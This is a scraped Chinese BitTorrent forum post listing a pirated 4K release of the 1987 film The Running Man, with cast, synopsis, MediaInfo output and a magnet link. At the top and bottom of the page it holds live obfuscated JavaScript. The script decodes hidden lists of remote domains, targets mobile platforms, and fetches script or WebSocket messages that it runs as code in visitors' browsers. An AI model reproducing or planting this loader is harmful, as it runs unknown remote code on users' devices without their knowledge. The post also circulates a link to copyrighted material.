过关斩将[国英多音轨/简繁字幕].The.Running.Man.1987.2160p.x265.10bit.DoVi.3Audios.mUHD 22.37GB

版主小s 1月前 182

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 过关斩将 / 魔鬼阿诺 / 威龙猛将 / 逃跑的人 / 跑步者

◎片 名 The Running Man

◎年 代 1987

◎产 地 美国

◎类 别 动作 / 科幻 / 惊悚

◎语 言 英语

◎上映日期 1987-11-13

◎IMDb链接 https://www.imdb.com/title/tt0093894/

◎豆瓣评分 6.8/10 (4979人评价)

◎豆瓣链接 https://movie.douban.com/subject/1292626/

◎片 长 101 分钟

◎导 演 保罗·迈克尔·格拉泽 Paul Michael Glaser (id:1002785)

◎编 剧 斯蒂芬·金 Stephen King (id:1049547)

斯蒂芬·E.德·索萨 Steven E. de Souza (id:1041340)

◎演 员 阿诺·施瓦辛格 Arnold Schwarzenegger (id:1035643)

玛利亚·康柯塔·阿隆索 Maria Conchita Alonso (id:1010619)

杰西·温图拉 Jesse Ventura (id:1009412)

Anthony Pena Anthony Pena (id:1132833)

爱德华·邦克 Edward Bunker (id:1014137)

史文-欧尔·托尔森 Sven-Ole Thorsen (id:1027355)

戴·扬 Dey Young (id:1161618)

罗德格尔·邦帕斯 Rodger Bumpass (id:1069989)

琳恩·玛丽·斯图尔特 Lynne Marie Stewart (id:1150122)

小托马斯·罗萨莱斯 Thomas Rosales Jr. (id:1143150)

罗杰·科恩 Roger Kern (id:1107517)

弗兰科·哥伦布 Franco Columbu (id:1022963)

博伊德·肯斯特纳 Boyd Kestner (id:1054936)

梅利莎·赫利 Melissa Hurley (id:1104779)

卡德罗莎·奥娜·卡罗尔 (id:1459808)

理查德·道森 Richard Dawson (id:1089960)

米克·弗利特伍德 Mick Fleetwood (id:1086212)

Billy D. Lucas Billy D. Lucas (id:1290412)

林·沙烨 Lin Shaye (id:1276530)

乔治·P·威尔伯 George P. Wilbur (id:1300897)

柯特·富勒 Kurt Fuller (id:1049882)

吉姆·布朗 Jim Brown (id:1055520)

Dweezil Zappa Dweezil Zappa (id:1050070)

亚非特·科托 Yaphet Kotto (id:1041210)

Erland van Lidth Erland van Lidth (id:1156264)

田中通教授 Professor Toru Tanaka (id:1157875)

Karen Leigh Hopkins Karen Leigh Hopkins (id:1286894)

哈罗德·方特梅耶 Harold Faltermeyer (id:1028099)

约翰·赖特 John Wright (id:1301301)

马克·华纳 Mark Warner (id:1300451)

杰基?伯奇 Jackie Burch (id:1279621)

Robert Blackman Robert Blackman (id:1278752)

Richard Miranda Richard Miranda (id:1292202)

Peter Tothpal Peter Tothpal (id:1276622)

史蒂夫·拉波特 Steve LaPorte (id:1289183)

James Lee McCoy James Lee McCoy (id:1291498)

杰夫·道恩 Jeff Dawn (id:1281940)

邦尼·帕克尔 Bunny Parker (id:1293970)

加里·古铁雷斯 Gary Gutierrez (id:1285677)

Bill Taylor Bill Taylor (id:1298968)

Sam Nicholson Sam Nicholson (id:1293152)

◎标 签 动作 / 科幻 / 美国 / 施瓦辛格 / 暴力 / 1987 / 阿诺德·施瓦辛格 / 美国电影

◎简 介

该片延续了施瓦辛格一贯的英雄风格。在2019年,美国已经成为了一个独裁国家,在这里,不容许有不同的声音出现。本(阿诺?施瓦辛格 Arnold Schwarzenegger 饰)是一名警察,因对当局的命令不满,拒不执行命令而被判有罪遭到逮捕。

现在只有一个机会能让本重获自由,那就是参加电视台的“过关斩将”节目并最终获胜。这个节目肆意歪曲事实,误导观众,节目里的有识之士被扭曲形象,遭到杀害。本千辛万苦从电视台逃出来后,联合了一班正义之士,准备杀回电视台拆穿这个节目的骗局!

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 217917900239322290741676405336351457371 (0xA3F17600BF1830484BD999E7A51C405B)

  4. Complete name : [email protected]QDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 22.4 GiB

  8. Duration : 1 h 40 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 31.8 Mb/s

  11. Encoded date : UTC 2021-10-26 14:56:44

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 40 min

  22. Bit rate : 25.9 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 636 pixels

  25. Display aspect ratio : 2.35:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.172

  32. Stream size : 18.3 GiB (82%)

  33. Writing library : x265 3.3+3-g8f8e332f1+29:[Windows][#Erg`Djh#][@Yuuki] made by @Dongfangbubai

  34. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=-3 / crqpoffs=-3 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=3.00 / deblock=-1:-1 / ref=5 / limit-refs=0 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=23 / max-keyint=240 / rc-lookahead=60 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=32 / min-cu-size=8 / me=3 / subme=4 / merange=25 / rdoq-level=2 / rd=4 / rdpenalty=1 / dynamic-rd=0.00 / no-rd-refine / ----- / no-cutree / no-sao / no-rect / no-amp / no-open-gop / wpp / pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=2 / tu-intra-depth=2 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541176575 / frame-threads=6 / numa-pools=54,- / log-level=2 / input-csp=1 / input-res=3840x1636 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=0 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=3966,523 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ=

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0050 cd/m2, max: 4000 cd/m2

  43. Maximum Content Light Level : 3966 cd/m2

  44. Maximum Frame-Average Light Level : 523 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : DTS ES XLL

  48. Format/Info : Digital Theater Systems

  49. Commercial name : DTS-HD Master Audio

  50. Codec ID : A_DTS

  51. Duration : 1 h 40 min

  52. Bit rate mode : Variable

  53. Bit rate : 5 148 kb/s

  54. Channel(s) : 8 channels

  55. Channel layout : C L R Ls Rs LFE Lb Rb

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 93.750 FPS (512 SPF)

  58. Bit depth : 24 bits

  59. Compression mode : Lossless

  60. Stream size : 3.63 GiB (16%)

  61. Title : 英语

  62. Language : English

  63. Default : Yes

  64. Forced : No


  65. Audio #2

  66. ID : 3

  67. Format : AC-3

  68. Format/Info : Audio Coding 3

  69. Commercial name : Dolby Digital

  70. Codec ID : A_AC3

  71. Duration : 1 h 40 min

  72. Bit rate mode : Constant

  73. Bit rate : 448 kb/s

  74. Channel(s) : 6 channels

  75. Channel layout : L R C LFE Ls Rs

  76. Sampling rate : 48.0 kHz

  77. Frame rate : 31.250 FPS (1536 SPF)

  78. Compression mode : Lossy

  79. Delay relative to video : 413 ms

  80. Stream size : 323 MiB (1%)

  81. Title : 京译国语

  82. Language : Chinese

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : AC-3

  89. Format/Info : Audio Coding 3

  90. Commercial name : Dolby Digital

  91. Codec ID : A_AC3

  92. Duration : 1 h 40 min

  93. Bit rate mode : Constant

  94. Bit rate : 192 kb/s

  95. Channel(s) : 2 channels

  96. Channel layout : L R

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Delay relative to video : 383 ms

  101. Stream size : 138 MiB (1%)

  102. Title : 上译国语

  103. Language : Chinese

  104. Service kind : Complete Main

  105. Default : No

  106. Forced : No


  107. Text #1

  108. ID : 5

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 38 min

  114. Bit rate : 33.3 kb/s

  115. Count of elements : 2292

  116. Stream size : 23.4 MiB (0%)

  117. Title : 英文

  118. Language : English

  119. Default : Yes

  120. Forced : No


  121. Text #2

  122. ID : 6

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 35 min

  128. Bit rate : 27.0 kb/s

  129. Count of elements : 2362

  130. Stream size : 18.3 MiB (0%)

  131. Title : 简中

  132. Language : Chinese

  133. Default : No

  134. Forced : No


  135. Text #3

  136. ID : 7

  137. Format : PGS

  138. Muxing mode : zlib

  139. Codec ID : S_HDMV/PGS

  140. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  141. Duration : 1 h 34 min

  142. Bit rate : 22.4 kb/s

  143. Count of elements : 2360

  144. Stream size : 15.0 MiB (0%)

  145. Title : 繁中

  146. Language : Chinese

  147. Default : No

  148. Forced : No


  149. Menu

  150. 00:00:00.000 : en:第 01 章

  151. 00:05:15.982 : en:第 02 章

  152. 00:17:14.158 : en:第 03 章

  153. 00:25:31.863 : en:第 04 章

  154. 00:30:43.091 : en:第 05 章

  155. 00:33:56.034 : en:第 06 章

  156. 00:47:45.821 : en:第 07 章

  157. 00:54:19.756 : en:第 08 章

  158. 01:02:11.686 : en:第 09 章

  159. 01:13:40.374 : en:第 10 章

  160. 01:16:17.739 : en:第 11 章

  161. 01:23:13.279 : en:第 12 章


TAGS 动作 惊悚 科幻

磁力链:
  • magnet:?xt=urn:btih:3AE0681B941161C55ACA9A791C48CF46580A8F48

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};